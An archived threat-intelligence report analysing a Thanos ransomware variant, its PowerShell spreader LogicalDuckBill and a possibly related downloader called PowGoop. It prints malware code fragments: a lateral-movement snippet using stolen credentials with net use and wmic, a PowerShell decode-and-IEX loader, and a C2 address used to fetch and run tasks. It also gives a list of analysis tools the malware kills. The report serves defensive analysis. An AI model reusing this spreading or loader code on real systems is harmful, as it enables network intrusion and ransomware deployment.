{
	"id": "37c4dc78-55cf-4855-8d8e-ae57eead8db1",
	"created_at": "2026-04-06T00:16:44.250367Z",
	"updated_at": "2026-04-10T03:20:04.704605Z",
	"deleted_at": null,
	"sha1_hash": "18bc0dba0a44b0f87d3431151a441ba3c19ecc2d",
	"title": "Thanos Ransomware: Destructive Variant Targeting State-Run Organizations in the Middle East and North Africa",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 281802,
	"plain_text": "Thanos Ransomware: Destructive Variant Targeting State-Run\r\nOrganizations in the Middle East and North Africa\r\nBy Robert Falcone\r\nPublished: 2020-09-04 · Archived: 2026-04-02 10:44:26 UTC\r\nExecutive Summary\r\nOn July 6 and July 9, 2020, we observed files associated with an attack on two state-run organizations in the\r\nMiddle East and North Africa that ultimately installed and ran a variant of the Thanos ransomware. The Thanos\r\nvariant created a text file that displayed a ransom message requesting the victim transfer “20,000$” into a\r\nspecified Bitcoin wallet to restore the files on the system. We do not have visibility into the overall impacts of\r\nthese attacks or whether or not the threat actors were successful in receiving a payment from the victims.\r\nFigure 1. Thanos’ ransom note displayed after encrypting files.  \r\nThe ransomware was also configured to overwrite the master boot record (MBR), which is an important\r\ncomponent loaded on a system’s hard drive that is required for the computer to locate and load the operating\r\nsystem. The ransomware overwrites the MBR to display the same ransom message as the previously mentioned\r\ntext file, which is a technique we do not see often. The most notable example we’ve observed involved the Petya\r\nransomware in 2017. Overwriting the MBR is a more destructive approach to ransomware than usual. Victims\r\nwould have to expend more effort to recover their files – even if they paid the ransom. Fortunately, in this case,\r\nthe code responsible for overwriting the MBR caused an exception because the ransom message contained invalid\r\ncharacters, which left the MBR intact and allowed the system to boot correctly. This means that even though the\r\nransomware was configured to overwrite the MBR, the threat actors were unsuccessful in causing the computers\r\nthey infected with the Thanos ransomware not to boot.\r\nhttps://unit42.paloaltonetworks.com/thanos-ransomware/\r\nPage 1 of 11\n\nFigure 2. Thanos’ ransom note displayed if MBR overwrite was successful.\r\nThe Thanos ransomware was first discussed by Recorded Future in February 2020 when it was advertised for sale\r\non underground forums. The Thanos ransomware has a builder that allows actors to customize the sample with a\r\nvariety of available settings. The fact Thanos is for sale suggests the likelihood of multiple threat actors using this\r\nransomware. However, we believe with high confidence that the same actor used a Thanos variant in attacks on\r\ntwo state-run organizations in the Middle East and North Africa.\r\nBased on our telemetry, we first observed Thanos on Jan. 13, 2020, and have seen over 130 unique samples since.\r\nWe believe the threat actors had prior access to these organizations’ networks, as the samples contained credentials\r\nthat we believe the actors had stolen from systems on these organizations’ networks prior to the delivery of the\r\nransomware.\r\nThis particular attack involved multiple layers of PowerShell scripts, inline C# code and shellcode in order to load\r\nThanos into memory and to run it on the local system. These layers were largely based on code freely available in\r\nopen source frameworks, such as Sharp-Suite and Donut. One of the layers involved a custom PowerShell that\r\nwas responsible for spreading Thanos to other systems on the local network using previously mentioned stolen\r\ncredentials.\r\nWe analyzed this specific Thanos sample that the actors built for the Middle Eastern and Northern African state-run organizations. We determined that the ransomware was loaded into and run from within memory at these\r\norganizations. We found the Thanos variant is functionally very similar to the variant discussed by Fortinet in July\r\n2020. The sample analyzed by Fortinet also contained network-spreading functionality enabled, which included\r\nnetwork credentials from another state-run organization in the same municipality as the Middle Eastern state-run\r\norganization we observed. The sample analyzed by Fortinet included the same Bitcoin wallet and contact email\r\nthat we observed. When combined with the targeting of an organization in the same municipality in a similar time\r\nframe, this suggests a common actor behind these attacks.\r\nhttps://unit42.paloaltonetworks.com/thanos-ransomware/\r\nPage 2 of 11\n\nPalo Alto Networks customers are protected from the attacks discussed in this blog by WildFire, which correctly\r\nidentifies all related samples as malicious, and Cortex XDR, which blocks the components involved in this\r\nransomware infection.\r\nOverview of Thanos Variant Activity\r\nWe do not know how the actors delivered the Thanos ransomware to the two state-run organizations in the Middle\r\nEast and North Africa. However, we know the threat group behind the use of these tools had previous access to\r\nthese networks as they had already obtained valid credentials from the networks. The exact same Thanos sample\r\nwas used at both of these organizations, which suggests that the same actor created the sample using the Thanos\r\nbuilder.\r\nThe Thanos sample created for these networks executes several layers before the .NET Thanos ransomware runs\r\non a system, specifically using code from several open source frameworks. The layers start at the top with a\r\nPowerShell script that not only loads another PowerShell script as a sub-layer, but also attempts to spread the\r\nransomware to other systems on the network using previously stolen credentials. The PowerShell in the second\r\nlayer does nothing more than load embedded C# code inline so the initial PowerShell script can execute it. The C#\r\ncode is the third layer, and it is based on UrbanBishop, which is publicly available as part of the Sharp-Suite\r\nframework on GitHub. The UrbanBishop code is responsible for writing shellcode to a remote process and\r\nexecuting it, of which the shellcode is the final layer before running the Thanos ransomware. The shellcode in this\r\ncase was created by Donut, which is another open source framework that will generate shellcode that can load and\r\nexecute .NET assemblies in memory.\r\nFigure 3. Layers executed to run the Thanos ransomware on the system.\r\nPowerShell Spreader\r\nThe PowerShell spreader, which we call LogicalDuckBill, has two primary purposes:\r\nhttps://unit42.paloaltonetworks.com/thanos-ransomware/\r\nPage 3 of 11\n\n1. Loading and running the Thanos ransomware.\r\n2. Spreading to other systems by copying itself to and executing itself on remote systems.\r\nThe loader functionality within LogicalDuckBill starts with a base64 encoded PowerShell script that it will decode\r\nand run using the IEX command. The PowerShell decoded and executed contains the following code, which\r\neffectively loads C# code based on UrbanBishop that LogicalDuckBill will call later to inject shellcode:\r\n$code = @\"\r\n[C# code based on UrbanBishop]\r\n\"@\r\nAdd-Type -TypeDefinition $code -Language CSharp\r\nLogicalDuckBill will then check to see if a file named “logdb.txt” or “logdb.txt.locked” exists in the “c:\\” drive\r\nbefore running, which is the method the spreader uses to be sure to only run one instance of the embedded\r\nransomware on each system. We also observed another related sample that looked for “logdbnnn.txt” instead,\r\nwhich is why we call this script LogicalDuckBill. If these files are not present, LogicalDuckBill will write “1” to\r\nthis text file and then continue to carry out its functionality.\r\nLogicalDuckBill then creates a “notepad.exe” process, which it will then iterate through running processes to find\r\nthe process ID (PID) of the created “notepad.exe” process. With the PID of the notepad process, the PowerShell\r\nscript calls the “Do” method in the loaded C# code based on UrbanBishop, which ultimately injects shellcode\r\ngenerated by the Donut framework into the notepad process and executes it. The shellcode then decrypts and loads\r\nan embedded .NET executable into memory and executes it, which is the Thanos ransomware payload.\r\nThe spreader functionality of LogicalDuckBill starts with the script using the Get-NetTCPConnection cmdlet to\r\nget the remote addresses of the current TCP connections on the system. The code then looks through these remote\r\naddresses for those that start with 10., 172. and 192. as the first octet and will iterate through each discovered\r\nnetwork by changing the last octet from 1 to 254 in a loop. For each iteration, the script will use the Test-NetConnection cmdlet to see if the script can connect to each remote system over SMB port tcp/445, and if it can,\r\nit uses the net use command to connect to the remote system with previously stolen credentials and mounts the\r\nremote system’s C: drive to the local system’s X: drive. The script then uses the copy command to copy itself to\r\nthe newly mapped X: drive, which effectively copies LogicalDuckBill to the remote system. The script will then\r\nuse wmic to run process call create on the remote system to run the newly copied LogicalDuckBill sample on the\r\nremote system. The spreading functionality finished each iteration by deleting the mapped drive, all of which is\r\ncarried out by the following code:\r\nif((Test-NetConnection $tr -Port 445).TcpTestSucceeded){\r\nnet use x: \\\\[IP address]\\c$ /user:[Victim Domain]\\[Username] [Password]\r\ncopy c:\\windows\\update4.ps1 x:\\windows\\update4.ps1\r\nwmic /node:[IP address] /user:[Victim Domain]\\[Username] /password:[Password] process call create \"powershell\r\n-exec bypass -file c:\\windows\\update4.ps1\"\r\nhttps://unit42.paloaltonetworks.com/thanos-ransomware/\r\nPage 4 of 11\n\nnet use x: /del /y\r\n}\r\nThis spreading method in LogicalDuckBill is similar to one found within Thanos’ C# code. However, using the\r\nPowerShell script to spread allowed the actors to include previously stolen network credentials when creating the\r\nmapped drive and when running the copied PowerShell script using wmic.\r\nThanos Ransomware\r\nThe Thanos ransomware was first observed by Recorded Future in February 2020 when it was advertised for sale\r\non underground forums. The Thanos ransomware has code overlaps with other ransomware variants, such as\r\nHakbit, and has a builder that allows the user to customize the sample with a variety of available settings. This\r\nransomware appears to be still under active development, as we observed newly added functionality in the\r\nsamples built to run on the Middle Eastern and Northern African state-run organizations compared to the original\r\nsamples analyzed by Recorded Future. In fact, the Thanos ransomware built to run on these two organizations’\r\nnetworks was closer in available functionality to the variant discussed by Fortinet in July 2020. The most obvious\r\ndifference is that the disabling of safe boot discussed by Fortinet is not available in these samples.\r\nLike other Thanos ransomware samples, the variant built to run on these two organizations’ networks uses a 2048-\r\nbit RSA public key to encrypt files whose file extensions match those listed in Table 1. After encrypting the file’s\r\ncontents, Thanos will add the file extension “.locked” to the file on disk.\r\ndat ppt mdb odg backup aiff\r\ntxt doc dbf raw pdf flac\r\njpeg docx odb nef cert m4a\r\ngif sxi myd svg docm csv\r\njpg sxw php psd xlsm sql\r\npng odt java vmx dwg ora\r\nphp hwp cpp vmdk bak mdf\r\ncs tar pas vdi qbw ldf\r\ncpp bz2 asm lay6 nd ndf\r\nrar mkv key sqlite3 tlg dtsx\r\nzip eml pfx sqlitedb lgb rdl\r\nhtml msg pem accdb pptx dim\r\nhtm ost p12 java mov mrimg\r\nhttps://unit42.paloaltonetworks.com/thanos-ransomware/\r\nPage 5 of 11\n\nxlsx pst csr class xdw qbb\r\nxls edb gpg mpeg ods rtf\r\navi sql aes djvu wav 7z\r\nmp4 accdb vsd tiff mp3\r\nTable 1. List of extensions of files that Thanos will encrypt.\r\nThis variant of Thanos writes a ransom note to a file named “HOW_TO_DECYPHER_FILES.txt” to the desktop\r\nand all of the folders that contained files that Thanos encrypted. The ransom note, as seen in Figure 2, requests\r\n“20,000$” worth of Bitcoin be transferred to a wallet “1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9” and a\r\ncontact email of “josephnull@secmail.pro” to recover the encrypted files. The contact email and Bitcoin wallet ID\r\nwere seen by other researchers and organizations in July 2020, as seen in the .HTA ransom note displayed in\r\nFortinet’s blog and several tweets.\r\nThe features and functionality within the Thanos ransomware have been analyzed by other organizations. Instead\r\nof rehashing this analysis, we will only discuss the functionality that was enabled within this variant of Thanos\r\nthat had not been discussed previously. However, we delineate which previously discussed functionalities are\r\ndisabled and enabled in this variant of Thanos in Tables 2 and 3 respectively.\r\nMax. File Size Protect Process Disable FAC\r\nPersistence - Melt Wallpaper Static Pass\r\nDeceiving Msg Immortal Process RIPlace\r\nUnlock Files FTP Logger Data Stealer\r\nAnti-VM Wake-on-LAN Max. Steal Size\r\nhttps://unit42.paloaltonetworks.com/thanos-ransomware/\r\nPage 6 of 11\n\nDelay Delayed Activation Alternate Algo\r\nAMSI Bypass Client Expiration Drag and Drop\r\nTable 2. Disabled functionality, which are likely unchecked boxes on the Thanos ransomware builder user\r\ninterface (UI).\r\nKill Defender Fast Mode Enhanced Notifications\r\nLAN AntiKill Customize Notifications\r\nTable 3. Enabled functionality, which are likely checked boxes on the Thanos ransomware builder UI.\r\nThe first configuration option enabled that doesn't match the analysis of previous variants of Thanos starts with\r\nthe code trying to disable User Account Control (UAC) by setting the keys \"LocalAccountTokenFilterPolicy\" and\r\n\"EnableLinkedConnections\" in SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System to 1. It then\r\nattempts to enumerate local and mapped storage volumes. To enumerate the local volumes, the code creates and\r\nruns a batch script that is almost exactly the same as the batch script used by Ragnar Locker ransomware to\r\nenumerate the local storage volumes. Ragnar Locker used this script to create a VirtualBox configuration file that\r\nsets these volumes as SharedFolders, which allows Ragnar Locker to access the local storage volumes while it\r\nruns within a VirtualBox virtual machine, as discussed by Sophos. The Thanos implementation does not write the\r\nresults to a VirtualBox configuration file. Instead, it just prints the configuration to the screen, but does not save\r\nthe output. Therefore, we cannot be certain of the purpose of this functionality.\r\nThe second functionality enabled in this sample that had not been observed in previous Thanos variants involved\r\nthe ability to overwrite the master boot record (MBR). Once the code checks to see if the operating system version\r\nis not \"Windows 10\" or \"Windows 8,\" the code will attempt to open \"\\\\.\\PhysicalDrive0\" and write a 512-byte\r\nstring to offset 0. The byte array that is written to offset 0 of \"\\\\.\\PhysicalDrive0\" initially has a ransom message of\r\n\"Your files are encrypted. Contact us at: get-my-data@protonmail.com...\", but the code will replace this string\r\nwith the following string before writing to disk:\r\nDon\\xe2\\x80\\x99t worry, you can return all your files!\\r\\n\\r\\nThe Price to get all things to the normal :\r\n20,000$\\r\\nMy BTC Wallet ID :\\r\\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\\r\\n\\r\\nContact:\r\njosephnull@secmail.pro\\r\\n\r\nThe interesting part of the overwriting of the MBR in this specific sample is that it does not work correctly, which\r\ncan be blamed on either a programming error or the custom message included by the actor. As you can see above,\r\nthe custom message has the bytes \"\\xe2\\x80\\x99\" for the apostrophe character in unicode, but the code attempts to\r\nconvert each character using the \"Convert.ToByte\" function to replace a single byte in the initial ransom string.\r\nHowever, the unicode apostrophe character is three bytes long and causes an exception that breaks the MBR\r\noverwriting functionality. We confirmed that after changing this single character, the MBR overwriting\r\nfunctionality works, which results in the following being displayed instead of Windows booting correctly:\r\nhttps://unit42.paloaltonetworks.com/thanos-ransomware/\r\nPage 7 of 11\n\nThe third previously unmentioned functionality in this Thanos sample involves creating a thread that watches for\r\nnewly connected storage volumes. The code uses a management event watcher that calls a function when a new\r\nstorage volume is connected using the following WMI query:\r\nSELECT * FROM Win32_VolumeChangeEvent WHERE EventType = 2\r\nWhen the event watcher detects a new storage volume connected, it creates a thread that carries out the file\r\nencrypting functionality used by Thanos to encrypt files on the original storage volumes.\r\nThe last functionality added to this version of Thanos is the ability to detect and kill more analysis tools to evade\r\ndetection and analysis. The sample will enumerate through running processes and kill those whose names match\r\nthe following:\r\nhttp analyzer stand-alone intercepter procexp64\r\nfiddler Intercepter-NG RDG Packer Detector\r\neffetech http sniffer ollydbg CFF Explorer\r\nfiresheep x64dbg PEiD\r\nIEWatch Professional x32dbg protection_id\r\ndumpcap dnspy LordPE\r\nwireshark dnspy-x86 pe-sieve\r\nwireshark portable de4dot MegaDumper\r\nsysinternals tcpview ilspy UnConfuserEx\r\nhttps://unit42.paloaltonetworks.com/thanos-ransomware/\r\nPage 8 of 11\n\nNetworkMiner dotpeek Universal_Fixer\r\nNetworkTrafficView dotpeek64 NoFuserEx\r\nHTTPNetworkSniffer ida64\r\ntcpdump procexp\r\nTable 4. List of tools this Thanos variant will detect and kill to evade detection\r\nPossibly Related Downloader: Introducing PowGoop\r\nWhile we cannot confirm the connection, we believe the actors deploying the Thanos ransomware at the Middle\r\nEastern state-run organization also used a downloader that we call PowGoop. The actors would use the PowGoop\r\ndownloader to reach out to a remote server to download and execute additional PowerShell scripts. The files\r\nexisted in the same environment as the LogicalDuckBill sample previously discussed, but we did not observe the\r\nactors specifically running both PowGoop and the LogicalDuckBill spreader. Also, as expected, there is very little\r\ncode overlap between the PowerShell code in this downloader and LogicalDuckBill, as their functionality differs\r\ndramatically. The only code overlap is a common variable name $a that both of the scripts use to store the base64\r\nencoded data prior to decoding, which is not a strong enough connection to suggest a common author.\r\nThe PowGoop downloader has two components: a DLL loader and a PowerShell-based downloader. The\r\nPowGoop loader component is responsible for decrypting and running the PowerShell code that comprises the\r\nPowGoop downloader. The PowGoop loader DLL that existed in the same environment as LogicalDuckBill had a\r\nfilename of goopdate.dll that was likely sideloaded by the legitimate and signed Google Update executable. The\r\nsideloading process would start with the legitimate GoogleUpdate.exe file loading a legitimate DLL with a name\r\nof goopdate86.dll. The sideloading would occur when the goopdate86.dll library loads the goopdate.dll file, which\r\neffectively runs the PowGoop loader. We observed the following files that are likely associated:\r\nSHA256 Filename\r\nb60e92004d394d0b14a8953a2ba29951c79f2f8a6c94f495e3153dfbbef115b6 GoogleUpdate.exe\r\ndea45dd3a35a5d92efa2726b52b0275121dceafdc7717a406f4cd294b10cd67e goopdate86.dll\r\na224cbaaaf43dfeb3c4f467610073711faed8d324c81c65579f49832ee17bda8 goopdate.dll\r\nb7437e3d5ca22484a13cae19bf805983a2e9471b34853d95b67d4215ec30a00e config.dat\r\nTable 5. List of files associated with the sideloading of the PowGoop downloader\r\nThe goopdate.dll file is the PowGoop loader, whose functionality exists within an exported function named\r\nDllRegisterServer. The goopdate.dll file’s DllEntryPoint function, which would be called if loaded via the\r\nsideloading process mentioned above, does nothing more than attempt to run the DllRegisterServer exported\r\nfunction using the following command:\r\nrundll32.exe \u003cmodule filename\u003e,DllRegisterServer\r\nhttps://unit42.paloaltonetworks.com/thanos-ransomware/\r\nPage 9 of 11\n\nThe functional code in DllRegisterServer reads a file named config.dat, decodes it and runs it as a PowerShell\r\nscript, which is the PowGoop downloader component. To decode the config.dat file, the DLL builds and executes\r\na PowerShell script using the CreateProcessA function. The PowerShell script built by the PowGoop loader will\r\nread the contents of the config.dat file, base64 decode and decrypt the contents using a simple subtract by two\r\ncipher and run the result PowGoop downloader script using the IEX command, as seen in the following:\r\npowershell -exec bypass function bdec($in){$out = [System.Convert]::FromBase64String($in);return\r\n[System.Text.Encoding]::UTF8.GetString($out);}function bDec2($szinput){$in =\r\n[System.Text.Encoding]::UTF8.GetBytes($szinput);for ($i=0; $i -le $in.count -1; $i++){$in[$i] = $in[$i] -\r\n2;}return [System.Text.Encoding]::UTF8.GetString($in);}function bDd($in){$dec = bdec $in;$temp = bDec2\r\n$dec;return $temp;}$a=get-content C:\\\\Users\\\\[username]\\\\Desktop\r\nconfig.dat;$t =bDd $a;iex($t);\r\nThe config.dat file we decrypted is the PowGoop downloader that the actors configured to use the following URL\r\nas its command and control (C2):\r\nhttp://107.174.241[.]175:80/index.php\r\nThe PowGoop downloader will communicate with the C2 server via HTTP GET requests to this URL. It will\r\nexpect the C2 server to respond to requests with base64 encoded data that the script will decode, decompress the\r\ndecoded data using System.IO.Compression.GzipStream and then decrypt the decompressed data using the same\r\nsubtract by two cipher used to decrypt the config.dat file. It will first communicate with the C2 to obtain a unique\r\nidentifier value that the C2 will assign to the compromised system. After obtaining this identifier, the script will\r\ncontinue to communicate with the C2 to obtain Tasks, which the script will decode, decompress, decrypt and run\r\nas PowerShell scripts. The script exfiltrates the result of a task to the C2 by encrypting the result using an add by\r\ntwo cipher, compressing the ciphertext and base64 encoding it, and transmitting it to the C2 server using a GET\r\nrequest with the data in the Cookie field of the HTTP request, specifically as the R value.\r\nConclusion\r\nActors used the Thanos ransomware to encrypt files and a PowerShell script to spread to additional systems,\r\nspecifically on networks of two state-run organizations in the Middle East and North Africa. The Thanos variant\r\ncreated a text file that displayed a ransom message requesting the victim transfer “20,000$” into a specified\r\nBitcoin wallet to restore the files on the system.\r\nWhile the Thanos ransomware is not new, it appears that it is still under active development as the variant used in\r\nthese attacks contained new functionality. The new functionality included the ability to detect and evade more\r\nanalysis tools, the enumeration of local storage volumes via a technique used by the Ragnar Locker ransomware\r\nand a new capability to monitor for newly attached storage devices.\r\nMost importantly, this variant of Thanos also included the new ability to overwrite the MBR and display the same\r\nransom message. Overwriting the MBR is a much more destructive approach to ransomware than previously used\r\nby Thanos and would require more effort for victims to recover their files even if they paid the ransom.\r\nPalo Alto Networks customers are protected from the attacks discussed in this blog in the following ways:\r\nhttps://unit42.paloaltonetworks.com/thanos-ransomware/\r\nPage 10 of 11\n\nAll known Thanos ransomware and LogicalDuckBill samples have malicious verdicts in WildFire.\r\nAutoFocus customers can track this ransomware, PowerShell spreading script and the potentially related\r\ndownloader with the tags Thanos, LogicalDuckBill and PowGoop.\r\nCortex XDR blocks Thanos ransomware, LogicalDuckBill and PowGoop.\r\nIndicators of Compromise\r\nLogicalDuckBill Samples\r\n40890a1ce7c5bf8fda7bd84b49c577e76e0431e4ce9104cc152694fc0029ccbf\r\n06d5967a6b90b5b5f6a24b5f1e6bfc0fc5c82e7674817644d9c3de61008236dc\r\ncbb95952001cdc3492ae8fd56701ceff1d1589bcfafd74be86991dc59385b82d\r\n240e3bd7209dc5151b3ead0285e29706dff5363b527d16ebcc2548c0450db819\r\nThanos Samples\r\n7aa46a296fbebdf3b13d399bf0dbe6e8a8fbcbc9ba696e5698326494b0da2e54\r\n58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f\r\nc460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850\r\nae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75\r\n5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d\r\nPowGoop Samples\r\nb60e92004d394d0b14a8953a2ba29951c79f2f8a6c94f495e3153dfbbef115b6 (legitimate Google installer,\r\nGoogleUpdate.exe)\r\ndea45dd3a35a5d92efa2726b52b0275121dceafdc7717a406f4cd294b10cd67e (legitimate Google DLL,\r\ngoopdate86.dll)\r\na224cbaaaf43dfeb3c4f467610073711faed8d324c81c65579f49832ee17bda8 (PowGoop Loader, goopdate.dll)\r\nb7437e3d5ca22484a13cae19bf805983a2e9471b34853d95b67d4215ec30a00e PowGoop Downloader, config.dat)\r\nPowGoop Infrastructure\r\n107.174.241[.]175\r\nSource: https://unit42.paloaltonetworks.com/thanos-ransomware/\r\nhttps://unit42.paloaltonetworks.com/thanos-ransomware/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/thanos-ransomware/"
	],
	"report_names": [
		"thanos-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434604,
	"ts_updated_at": 1775791204,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/18bc0dba0a44b0f87d3431151a441ba3c19ecc2d.pdf",
		"text": "https://archive.orkl.eu/18bc0dba0a44b0f87d3431151a441ba3c19ecc2d.txt",
		"img": "https://archive.orkl.eu/18bc0dba0a44b0f87d3431151a441ba3c19ecc2d.jpg"
	}
}